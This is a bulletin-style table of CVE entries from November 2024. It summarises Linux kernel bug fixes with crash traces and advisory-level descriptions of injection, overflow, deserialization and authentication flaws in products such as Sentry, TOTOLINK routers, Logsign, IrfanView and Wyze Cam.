In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix possible exec queue leak in exec IOCTL In a couple of places after an exec queue is looked up the exec IOCTL returns on input errors without dropping the exec queue ref. Fix this ensuring the exec queue ref is dropped on input error. (cherry picked from commit 07064a200b40ac2195cb6b7b779897d9377e5e6f) | 2024-11-19 | not yet calculated | CVE-2024-53087 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: LoongArch: KVM: Mark hrtimer to expire in hard interrupt context Like commit 2c0d278f3293f ("KVM: LAPIC: Mark hrtimer to expire in hard interrupt context") and commit 9090825fa9974 ("KVM: arm/arm64: Let the timer expire in hardirq context on RT"), On PREEMPT_RT enabled kernels unmarked hrtimers are moved into soft interrupt expiry mode by default. Then the timers are canceled from an preempt-notifier which is invoked with disabled preemption which is not allowed on PREEMPT_RT. The timer callback is short so in could be invoked in hard-IRQ context. So let the timer expire on hard-IRQ context even on -RT. This fix a "scheduling while atomic" bug for PREEMPT_RT enabled kernels: BUG: scheduling while atomic: qemu-system-loo/1011/0x00000002 Modules linked in: amdgpu rfkill nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat ns CPU: 1 UID: 0 PID: 1011 Comm: qemu-system-loo Tainted: G W 6.12.0-rc2+ #1774 Tainted: [W]=WARN Hardware name: Loongson Loongson-3A5000-7A1000-1w-CRB/Loongson-LS3A5000-7A1000-1w-CRB, BIOS vUDK2018-LoongArch-V2.0.0-prebeta9 10/21/2022 Stack : ffffffffffffffff 0000000000000000 9000000004e3ea38 9000000116744000 90000001167475a0 0000000000000000 90000001167475a8 9000000005644830 90000000058dc000 90000000058dbff8 9000000116747420 0000000000000001 0000000000000001 6a613fc938313980 000000000790c000 90000001001c1140 00000000000003fe 0000000000000001 000000000000000d 0000000000000003 0000000000000030 00000000000003f3 000000000790c000 9000000116747830 90000000057ef000 0000000000000000 9000000005644830 0000000000000004 0000000000000000 90000000057f4b58 0000000000000001 9000000116747868 900000000451b600 9000000005644830 9000000003a13998 0000000010000020 00000000000000b0 0000000000000004 0000000000000000 0000000000071c1d ... Call Trace: [<9000000003a13998>] show_stack+0x38/0x180 [<9000000004e3ea34>] dump_stack_lvl+0x84/0xc0 [<9000000003a71708>] __schedule_bug+0x48/0x60 [<9000000004e45734>] __schedule+0x1114/0x1660 [<9000000004e46040>] schedule_rtlock+0x20/0x60 [<9000000004e4e330>] rtlock_slowlock_locked+0x3f0/0x10a0 [<9000000004e4f038>] rt_spin_lock+0x58/0x80 [<9000000003b02d68>] hrtimer_cancel_wait_running+0x68/0xc0 [<9000000003b02e30>] hrtimer_cancel+0x70/0x80 [<ffff80000235eb70>] kvm_restore_timer+0x50/0x1a0 [kvm] [<ffff8000023616c8>] kvm_arch_vcpu_load+0x68/0x2a0 [kvm] [<ffff80000234c2d4>] kvm_sched_in+0x34/0x60 [kvm] [<9000000003a749a0>] finish_task_switch.isra.0+0x140/0x2e0 [<9000000004e44a70>] __schedule+0x450/0x1660 [<9000000004e45cb0>] schedule+0x30/0x180 [<ffff800002354c70>] kvm_vcpu_block+0x70/0x120 [kvm] [<ffff800002354d80>] kvm_vcpu_halt+0x60/0x3e0 [kvm] [<ffff80000235b194>] kvm_handle_gspr+0x3f4/0x4e0 [kvm] [<ffff80000235f548>] kvm_handle_exit+0x1c8/0x260 [kvm] | 2024-11-21 | not yet calculated | CVE-2024-53089 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: afs: Fix lock recursion afs_wake_up_async_call() can incur lock recursion. The problem is that it is called from AF_RXRPC whilst holding the ->notify_lock, but it tries to take a ref on the afs_call struct in order to pass it to a work queue - but if the afs_call is already queued, we then have an extraneous ref that must be put... calling afs_put_call() may call back down into AF_RXRPC through rxrpc_kernel_shutdown_call(), however, which might try taking the ->notify_lock again. This case isn't very common, however, so defer it to a workqueue. The oops looks something like: BUG: spinlock recursion on CPU#0, krxrpcio/7001/1646 lock: 0xffff888141399b30, .magic: dead4ead, .owner: krxrpcio/7001/1646, .owner_cpu: 0 CPU: 0 UID: 0 PID: 1646 Comm: krxrpcio/7001 Not tainted 6.12.0-rc2-build3+ #4351 Hardware name: ASUS All Series/H97-PLUS, BIOS 2306 10/09/2014 Call Trace: <TASK> dump_stack_lvl+0x47/0x70 do_raw_spin_lock+0x3c/0x90 rxrpc_kernel_shutdown_call+0x83/0xb0 afs_put_call+0xd7/0x180 rxrpc_notify_socket+0xa0/0x190 rxrpc_input_split_jumbo+0x198/0x1d0 rxrpc_input_data+0x14b/0x1e0 ? rxrpc_input_call_packet+0xc2/0x1f0 rxrpc_input_call_event+0xad/0x6b0 rxrpc_input_packet_on_conn+0x1e1/0x210 rxrpc_input_packet+0x3f2/0x4d0 rxrpc_io_thread+0x243/0x410 ? __pfx_rxrpc_io_thread+0x10/0x10 kthread+0xcf/0xe0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x24/0x40 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> | 2024-11-21 | not yet calculated | CVE-2024-53090 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf: Add sk_is_inet and IS_ICSK check in tls_sw_has_ctx_tx/rx As the introduction of the support for vsock and unix sockets in sockmap, tls_sw_has_ctx_tx/rx cannot presume the socket passed in must be IS_ICSK. vsock and af_unix sockets have vsock_sock and unix_sock instead of inet_connection_sock. For these sockets, tls_get_ctx may return an invalid pointer and cause page fault in function tls_sw_ctx_rx. BUG: unable to handle page fault for address: 0000000000040030 Workqueue: vsock-loopback vsock_loopback_work RIP: 0010:sk_psock_strp_data_ready+0x23/0x60 Call Trace: ? __die+0x81/0xc3 ? no_context+0x194/0x350 ? do_page_fault+0x30/0x110 ? async_page_fault+0x3e/0x50 ? sk_psock_strp_data_ready+0x23/0x60 virtio_transport_recv_pkt+0x750/0x800 ? update_load_avg+0x7e/0x620 vsock_loopback_work+0xd0/0x100 process_one_work+0x1a7/0x360 worker_thread+0x30/0x390 ? create_worker+0x1a0/0x1a0 kthread+0x112/0x130 ? __kthread_cancel_work+0x40/0x40 ret_from_fork+0x1f/0x40 v2: - Add IS_ICSK check v3: - Update the commits in Fixes | 2024-11-21 | not yet calculated | CVE-2024-53091 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: virtio_pci: Fix admin vq cleanup by using correct info pointer vp_modern_avq_cleanup() and vp_del_vqs() clean up admin vq resources by virtio_pci_vq_info pointer. The info pointer of admin vq is stored in vp_dev->admin_vq.info instead of vp_dev->vqs[]. Using the info pointer from vp_dev->vqs[] for admin vq causes a kernel NULL pointer dereference bug. In vp_modern_avq_cleanup() and vp_del_vqs(), get the info pointer from vp_dev->admin_vq.info for admin vq to clean up the resources. Also make info ptr as argument of vp_del_vq() to be symmetric with vp_setup_vq(). vp_reset calls vp_modern_avq_cleanup, and causes the Call Trace: ================================================================== BUG: kernel NULL pointer dereference, address:0000000000000000 ... CPU: 49 UID: 0 PID: 4439 Comm: modprobe Not tainted 6.11.0-rc5 #1 RIP: 0010:vp_reset+0x57/0x90 [virtio_pci] Call Trace: <TASK> ... ? vp_reset+0x57/0x90 [virtio_pci] ? vp_reset+0x38/0x90 [virtio_pci] virtio_reset_device+0x1d/0x30 remove_vq_common+0x1c/0x1a0 [virtio_net] virtnet_remove+0xa1/0xc0 [virtio_net] virtio_dev_remove+0x46/0xa0 ... virtio_pci_driver_exit+0x14/0x810 [virtio_pci] ================================================================== | 2024-11-21 | not yet calculated | CVE-2024-53092 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nvme-multipath: defer partition scanning We need to suppress the partition scan from occuring within the controller's scan_work context. If a path error occurs here, the IO will wait until a path becomes available or all paths are torn down, but that action also occurs within scan_work, so it would deadlock. Defer the partion scan to a different context that does not block scan_work. | 2024-11-21 | not yet calculated | CVE-2024-53093 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: RDMA/siw: Add sendpage_ok() check to disable MSG_SPLICE_PAGES While running ISER over SIW, the initiator machine encounters a warning from skb_splice_from_iter() indicating that a slab page is being used in send_page. To address this, it is better to add a sendpage_ok() check within the driver itself, and if it returns 0, then MSG_SPLICE_PAGES flag should be disabled before entering the network stack. A similar issue has been discussed for NVMe in this thread: https://lore.kernel.org/all/20240530142417.146696-1-ofir.gal@volumez.com/ WARNING: CPU: 0 PID: 5342 at net/core/skbuff.c:7140 skb_splice_from_iter+0x173/0x320 Call Trace: tcp_sendmsg_locked+0x368/0xe40 siw_tx_hdt+0x695/0xa40 [siw] siw_qp_sq_process+0x102/0xb00 [siw] siw_sq_resume+0x39/0x110 [siw] siw_run_sq+0x74/0x160 [siw] kthread+0xd2/0x100 ret_from_fork+0x34/0x40 ret_from_fork_asm+0x1a/0x30 | 2024-11-21 | not yet calculated | CVE-2024-53094 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: smb: client: Fix use-after-free of network namespace. Recently, we got a customer report that CIFS triggers oops while reconnecting to a server. [0] The workload runs on Kubernetes, and some pods mount CIFS servers in non-root network namespaces. The problem rarely happened, but it was always while the pod was dying. The root cause is wrong reference counting for network namespace. CIFS uses kernel sockets, which do not hold refcnt of the netns that the socket belongs to. That means CIFS must ensure the socket is always freed before its netns; otherwise, use-after-free happens. The repro steps are roughly: 1. mount CIFS in a non-root netns 2. drop packets from the netns 3. destroy the netns 4. unmount CIFS We can reproduce the issue quickly with the script [1] below and see the splat [2] if CONFIG_NET_NS_REFCNT_TRACKER is enabled. When the socket is TCP, it is hard to guarantee the netns lifetime without holding refcnt due to async timers. Let's hold netns refcnt for each socket as done for SMC in commit 9744d2bf1976 ("smc: Fix use-after-free in tcp_write_timer_handler()."). Note that we need to move put_net() from cifs_put_tcp_session() to clean_demultiplex_info(); otherwise, __sock_create() still could touch a freed netns while cifsd tries to reconnect from cifs_demultiplex_thread(). Also, maybe_get_net() cannot be put just before __sock_create() because the code is not under RCU and there is a small chance that the same address happened to be reallocated to another netns. [0]: CIFS: VFS: \\XXXXXXXXXXX has not responded in 15 seconds. Reconnecting... CIFS: Serverclose failed 4 times, giving up Unable to handle kernel paging request at virtual address 14de99e461f84a07 Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004 CM = 0, WnR = 0 [14de99e461f84a07] address between user and kernel address ranges Internal error: Oops: 0000000096000004 [#1] SMP Modules linked in: cls_bpf sch_ingress nls_utf8 cifs cifs_arc4 cifs_md4 dns_resolver tcp_diag inet_diag veth xt_state xt_connmark nf_conntrack_netlink xt_nat xt_statistic xt_MASQUERADE xt_mark xt_addrtype ipt_REJECT nf_reject_ipv4 nft_chain_nat nf_nat xt_conntrack nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 xt_comment nft_compat nf_tables nfnetlink overlay nls_ascii nls_cp437 sunrpc vfat fat aes_ce_blk aes_ce_cipher ghash_ce sm4_ce_cipher sm4 sm3_ce sm3 sha3_ce sha512_ce sha512_arm64 sha1_ce ena button sch_fq_codel loop fuse configfs dmi_sysfs sha2_ce sha256_arm64 dm_mirror dm_region_hash dm_log dm_mod dax efivarfs CPU: 5 PID: 2690970 Comm: cifsd Not tainted 6.1.103-109.184.amzn2023.aarch64 #1 Hardware name: Amazon EC2 r7g.4xlarge/, BIOS 1.0 11/1/2018 pstate: 00400005 (nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : fib_rules_lookup+0x44/0x238 lr : __fib_lookup+0x64/0xbc sp : ffff8000265db790 x29: ffff8000265db790 x28: 0000000000000000 x27: 000000000000bd01 x26: 0000000000000000 x25: ffff000b4baf8000 x24: ffff00047b5e4580 x23: ffff8000265db7e0 x22: 0000000000000000 x21: ffff00047b5e4500 x20: ffff0010e3f694f8 x19: 14de99e461f849f7 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 x14: 0000000000000000 x13: 0000000000000000 x12: 3f92800abd010002 x11: 0000000000000001 x10: ffff0010e3f69420 x9 : ffff800008a6f294 x8 : 0000000000000000 x7 : 0000000000000006 x6 : 0000000000000000 x5 : 0000000000000001 x4 : ffff001924354280 x3 : ffff8000265db7e0 x2 : 0000000000000000 x1 : ffff0010e3f694f8 x0 : ffff00047b5e4500 Call trace: fib_rules_lookup+0x44/0x238 __fib_lookup+0x64/0xbc ip_route_output_key_hash_rcu+0x2c4/0x398 ip_route_output_key_hash+0x60/0x8c tcp_v4_connect+0x290/0x488 __inet_stream_connect+0x108/0x3d0 inet_stream_connect+0x50/0x78 kernel_connect+0x6c/0xac generic_ip_conne ---truncated--- | 2024-11-21 | not yet calculated | CVE-2024-53095 |
| n/a -- n/a |
Sentry is an error tracking and performance monitoring platform. Version 24.11.0, and only version 24.11.0, is vulnerable to a scenario where a specific error message generated by the Sentry platform could include a plaintext Client ID and Client Secret for an application integration. The Client ID and Client Secret would not be displayed in the UI, but would be returned in the underlying HTTP response to the end user. This could occur under the following conditions: An app installation made use of a Search UI component with the `async` flag set to true (default: true); auser types types into the Search Component which creates a request to the third-party for search or query results; and that third-party response may then fail validation and Sentry would return the `select-requester.invalid-response` error code along with a serialized version of a Sentry application containing the integration Client Secret. Should this error be found, it's reasonable to assume the potential exposure of an integration Client Secret. However, an ID and Secret pair alone does not provide direct access to any data. For that secret to be abused an attacker would also need to obtain a valid API token for a Sentry application. Sentry SaaS users do not need to take any action. For Sentry SaaS users, only a single application integration was impacted and the owner has rotated their Client Secret. No abuse of the leaked Client Secret has occurred. As of time of publication, a fix is available for users of Sentry self-hosted in pull request 81038. Sentry self-hosted does not ship with any application integrations. This could only impact self-hosted users that maintain their own integrations. In that case, search for a `select-requester.invalid-response` event. Please note that this error was also shared with another event unrelated to this advisory so Sentry self-hosted users will also need to review the parameters logged for each named event. Sentry self-hosted users may review `select_requester.py` for the instances where these errors can be generated. With the security fix this is no longer a shared event type. Sentry self-hosted users may not install version 24.11.0 and instead wait for the next release. Self-hosted instance that are already running the affected version may consider downgrading to to 24.10.0. | 2024-11-22 | not yet calculated | CVE-2024-53253 |
| n/a -- n/a |
TOTOLINK EX200 v4.0.3c.7646_B20201211 was found to contain a command insertion vulnerability in the setUssd function. This vulnerability allows an attacker to execute arbitrary commands via the "ussd" parameter. | 2024-11-21 | not yet calculated | CVE-2024-53333 |
| n/a -- n/a |
TOTOLINK A810R V4.1.2cu.5182_B20201026 is vulnerable to Buffer Overflow in infostat.cgi. | 2024-11-21 | not yet calculated | CVE-2024-53334 |
| n/a -- n/a |
TOTOLINK A810R V4.1.2cu.5182_B20201026 is vulnerable to Buffer Overflow in downloadFlile.cgi. | 2024-11-21 | not yet calculated | CVE-2024-53335 |
| n/a -- n/a |
A heap-buffer-overflow vulnerability was discovered in the SkipSpacesAndLineEnd function in Assimp v5.4.3. This issue occurs when processing certain malformed MD5 model files, leading to an out-of-bounds read and potential application crash. | 2024-11-21 | not yet calculated | CVE-2024-53425 |
| n/a -- n/a |
A heap-buffer-overflow vulnerability has been identified in ntopng 6.2 in the Flow::dissectMDNS function. | 2024-11-21 | not yet calculated | CVE-2024-53426 |
| n/a -- n/a |
Open62541 v1.4.6 is has an assertion failure in fuzz_binary_decode, which leads to a crash. | 2024-11-21 | not yet calculated | CVE-2024-53429 |
| n/a -- n/a |
While parsing certain malformed PLY files, PCL version 1.14.1 crashes due to an uncaught std::out_of_range exception in PCLPointCloud2::at. This issue could potentially be exploited to cause a denial-of-service (DoS) attack when processing untrusted PLY files. | 2024-11-21 | not yet calculated | CVE-2024-53432 |
| n/a -- n/a |
EventAttendance.php in ChurchCRM 5.7.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability by manipulating the 'Event' parameter, which is directly interpolated into the SQL query without proper sanitization or validation, allowing attackers to execute arbitrary SQL commands. | 2024-11-22 | not yet calculated | CVE-2024-53438 |
| n/a -- n/a |
virtualenv before 20.26.6 allows command injection through the activation scripts for a virtual environment. Magic template strings are not quoted correctly when replacing. NOTE: this is not the same as CVE-2024-9287. | 2024-11-24 | not yet calculated | CVE-2024-53899 |
| n/a -- n/a |
The Imager package before 1.025 for Perl has a heap-based buffer overflow leading to denial of service, or possibly unspecified other impact, when the trim() method is called on a crafted input image. | 2024-11-24 | not yet calculated | CVE-2024-53901 |
| n/a -- n/a |
An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24334. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized. | 2024-11-24 | not yet calculated | CVE-2024-53909 |
| n/a -- n/a |
An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24336. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized. | 2024-11-24 | not yet calculated | CVE-2024-53910 |
| n/a -- n/a |
An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24339. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized. | 2024-11-24 | not yet calculated | CVE-2024-53911 |
| n/a -- n/a |
An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24341. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized. | 2024-11-24 | not yet calculated | CVE-2024-53912 |
| n/a -- n/a |
An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24343. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized. | 2024-11-24 | not yet calculated | CVE-2024-53913 |
| n/a -- n/a |
An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24344. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized. | 2024-11-24 | not yet calculated | CVE-2024-53914 |
| n/a -- n/a |
An issue was discovered in the server in Veritas Enterprise Vault before 15.2, ZDI-CAN-24405. It allows remote attackers to execute arbitrary code because untrusted data, received on a .NET Remoting TCP port, is deserialized. | 2024-11-24 | not yet calculated | CVE-2024-53915 |
| n/a -- n/a |
Kofax Power PDF JP2 File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22019. | 2024-11-22 | not yet calculated | CVE-2024-5510 |
| n/a -- n/a |
Kofax Power PDF JP2 File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22020. | 2024-11-22 | not yet calculated | CVE-2024-5511 |
| n/a -- n/a |
Kofax Power PDF JP2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-22021. | 2024-11-22 | not yet calculated | CVE-2024-5512 |
| n/a -- n/a |
Kofax Power PDF JP2 File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22044. | 2024-11-22 | not yet calculated | CVE-2024-5513 |
| n/a -- n/a |
Allegra renderFieldMatch Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability. The specific flaw exists within the renderFieldMatch method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-23451. | 2024-11-22 | not yet calculated | CVE-2024-5579 |
| n/a -- n/a |
Allegra loadFieldMatch Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability. The specific flaw exists within the loadFieldMatch method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-23452. | 2024-11-22 | not yet calculated | CVE-2024-5580 |
| n/a -- n/a |
Allegra unzipFile Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability. The specific flaw exists within the unzipFile method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-23453. | 2024-11-22 | not yet calculated | CVE-2024-5581 |
| n/a -- n/a |
Logsign Unified SecOps Platform Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Logsign Unified SecOps Platform. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password reset mechanism. The issue results from the lack of restriction of excessive authentication attempts. An attacker can leverage this vulnerability to reset a user's password and bypass authentication on the system. Was ZDI-CAN-24164. | 2024-11-22 | not yet calculated | CVE-2024-5716 |
| n/a -- n/a |
Logsign Unified SecOps Platform Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Logsign Unified SecOps Platform. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the implementation of the HTTP API. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24165. | 2024-11-22 | not yet calculated | CVE-2024-5717 |
| n/a -- n/a |
Logsign Unified SecOps Platform Missing Authentication Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Logsign Unified SecOps Platform. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the cluster HTTP API, which listens on TCP port 1924 by default when enabled. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24166. | 2024-11-22 | not yet calculated | CVE-2024-5718 |
| n/a -- n/a |
Logsign Unified SecOps Platform Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Logsign Unified SecOps Platform. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the implementation of the HTTP API. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24167. | 2024-11-22 | not yet calculated | CVE-2024-5719 |
| n/a -- n/a |
Logsign Unified SecOps Platform Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Logsign Unified SecOps Platform. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the implementation of the HTTP API. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24168. | 2024-11-22 | not yet calculated | CVE-2024-5720 |
| n/a -- n/a |
Logsign Unified SecOps Platform Missing Authentication Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Logsign Unified SecOps Platform. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the cluster HTTP API, which listens on TCP port 1924 when enabled. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24169. | 2024-11-22 | not yet calculated | CVE-2024-5721 |
| n/a -- n/a |
Logsign Unified SecOps Platform HTTP API Hard-coded Cryptographic Key Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Logsign Unified SecOps Platform. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HTTP API. The issue results from using a hard-coded cryptographic key. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24170. | 2024-11-22 | not yet calculated | CVE-2024-5722 |
| n/a -- n/a |
IrfanView PNT File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PNT files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23969. | 2024-11-22 | not yet calculated | CVE-2024-5874 |
| n/a -- n/a |
IrfanView SHP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SHP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23972. | 2024-11-22 | not yet calculated | CVE-2024-5875 |
| n/a -- n/a |
IrfanView PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23973. | 2024-11-22 | not yet calculated | CVE-2024-5876 |
| n/a -- n/a |
IrfanView PIC File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PIC files. The issue results from the lack of proper validation of user-supplied data, which can result in a write before the start of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23974. | 2024-11-22 | not yet calculated | CVE-2024-5877 |
| n/a -- n/a |
Check Point ZoneAlarm Extreme Security Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Check Point ZoneAlarm Extreme Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Forensic Recorder service. By creating a symbolic link, an attacker can abuse the service to overwrite arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-21677. | 2024-11-22 | not yet calculated | CVE-2024-6233 |
| n/a -- n/a |
Wyze Cam v3 Realtek Wi-Fi Driver Heap-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Wyze Cam v3 IP cameras. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Realtek Wi-Fi kernel module. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the kernel. Was ZDI-CAN-22310. | 2024-11-22 | not yet calculated | CVE-2024-6246 |
| n/a -- n/a |
Wyze Cam v3 Wi-Fi SSID OS Command Injection Remote Code Execution Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Wyze Cam v3 IP cameras. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of SSIDs embedded in scanned QR codes. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-22337. | 2024-11-22 | not yet calculated | CVE-2024-6247 |
| n/a -- n/a |
Wyze Cam v3 Cloud Infrastructure Improper Authentication Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Wyze Cam v3 IP cameras. Authentication is not required to exploit this vulnerability. The specific flaw exists within the run_action_batch endpoint of the cloud infrastructure. The issue results from the use of the device's MAC address as a sole credential for authentication. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-22393. | 2024-11-22 | not yet calculated | CVE-2024-6248 |
| n/a -- n/a |
Wyze Cam v3 TCP Traffic Handling Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Wyze Cam v3 IP cameras. Authentication is not required to exploit this vulnerability. The specific flaw exists within the TUTK P2P library. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-22419. | 2024-11-22 | not yet calculated | CVE-2024-6249 |
| n/a -- n/a |
